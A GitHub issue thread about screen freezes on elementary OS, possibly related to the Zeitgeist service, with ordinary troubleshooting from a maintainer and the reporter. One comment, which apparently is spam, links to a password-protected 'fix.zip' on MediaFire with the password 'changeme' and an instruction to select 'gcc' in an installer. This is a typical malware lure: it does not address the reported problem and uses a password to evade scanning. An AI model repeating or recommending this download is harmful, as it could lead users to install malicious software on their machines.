### ISSUE TITLE
Screen freezing because of Zeitgeist?

### ISSUE THREAD

**Issue by Letterus** [elementary/applications-menu#607]
### What Happened?

I've got problems with hanging/freezing screen, which may be related to Zeitgeist.

see https://github.com/elementary/gala/issues/2023

### Steps to Reproduce

see

### Expected Behavior

issue linked

### OS Version

8.x (Early Access)

### Software Version

Latest release (I have run all updates)

**Comment by davidmhewitt** [comment]
If you disable it, does the freezing go away?

Not at the PC to check how the service is started. It's probably either a systemd service, or an autostart in /etc/xdg/autostart

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Letterus** [comment]
Nope, I made it freeze again. It's not limited to Zeitgeist. See linked issue.
